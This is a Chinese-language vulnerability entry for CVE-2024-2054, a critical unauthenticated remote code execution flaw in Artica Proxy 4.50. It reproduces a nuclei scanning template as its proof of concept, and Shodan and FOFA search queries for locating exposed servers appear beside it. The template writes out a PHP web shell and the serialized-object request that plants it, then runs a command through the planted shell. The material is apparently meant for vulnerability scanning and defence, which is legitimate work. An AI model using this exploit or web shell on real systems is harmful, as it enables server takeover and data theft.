漏洞信息
漏洞名称: Artica Proxy 远程代码执行漏洞
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Artica Proxy是一款广泛使用的代理服务器软件,主要用于企业级网络环境中,提供网络流量管理、内容过滤等功能。由于其广泛的应用,该软件的漏洞可能对大量企业网络构成威胁。该漏洞存在于Artica Proxy的特定端点中,攻击者可以通过构造特殊的HTTP请求,利用该端点实现远程代码执行。漏洞的技术根源在于软件未能正确验证和处理用户输入,导致攻击者可以注入并执行任意命令。这种漏洞的严重性在于,它不需要任何形式的身份验证即可被利用,且可以被自动化工具大规模利用,从而可能导致服务器被完全控制、数据泄露或服务中断。由于CVSS评分为9.8,属于严重级别,建议所有使用受影响版本的用户立即采取修补措施。
产品厂商: articatech
产品名称: artica_proxy
影响版本: 4.50
搜索语法: http.html:”artica” OR body=”artica”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/2ac85447c84c5077f49708edb15e5c6501e5edec/http%2Fcves%2F2024%2FCVE-2024-2054.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64
| id: CVE-2024-2054
info: name: Artica Proxy - RCE author: pussycat0x severity: critical description: | This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint. reference: - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py - https://github.com/tanjiti/sec_profile - https://github.com/Madan301/CVE-2024-2054 - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2054 cwe-id: CWE-502 epss-score: 0.79565 epss-percentile: 0.99025 cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:* metadata: vendor: articatech product: artica_proxy shodan-query: http.html:"artica" fofa-query: body="artica" tags: cve,cve2024,rce,artica,proxy,intrusive
variables: websh: '<?php system($_GET["cmd"]);?>' payload: '{{base64(websh)}}'
http: - raw: - | GET /wizard/wiz.upload.php HTTP/1.1 Host: {{Hostname}}
- | GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D HTTP/1.1 Host: {{Hostname}} User-Agent: python-requests/2.32.3
- | GET /wizard/wiz.upload.php?cmd=id HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "wiz.wizard.progress.php"
- type: regex part: body regex: - "uid=[0-9]+.*gid=[0-9]+.*"
|